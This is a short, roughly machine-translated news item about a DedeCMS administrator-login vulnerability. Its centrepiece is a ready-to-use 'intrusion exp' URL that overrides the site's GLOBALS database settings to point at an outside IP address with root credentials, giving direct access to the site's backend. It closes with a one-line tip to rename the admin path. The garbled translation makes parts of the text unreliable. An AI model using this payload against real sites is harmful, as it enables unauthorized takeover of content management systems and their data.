As we all know, because the use of simple, customer base, dream-woven CMS has been a lot of loopholes.
Today's small knitting in the group Get Dream Official forum a moderator reliable news: "Dedecms explosion serious security loophole,
Recently, the official will release the relevant patches, hope that we pay attention to the patch dynamic. ”
Intrusion exp is as follows:
http://www.xxx.com/dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_post[ Globals][cfg_dbhost]=116.255.183.90&_post[globals][cfg_dbuser]=root&_post[globals][cfg_dbpwd]=r0t0 &_post[globals][cfg_dbname]=root
The above black bottom yellow word on the letter to the current verification code, you can go directly to the background of the site.
Small series analysis, the premise of this vulnerability is to have to get a background path to achieve, so everyone
Be sure to develop the habit of changing the background name when using DEDECM station.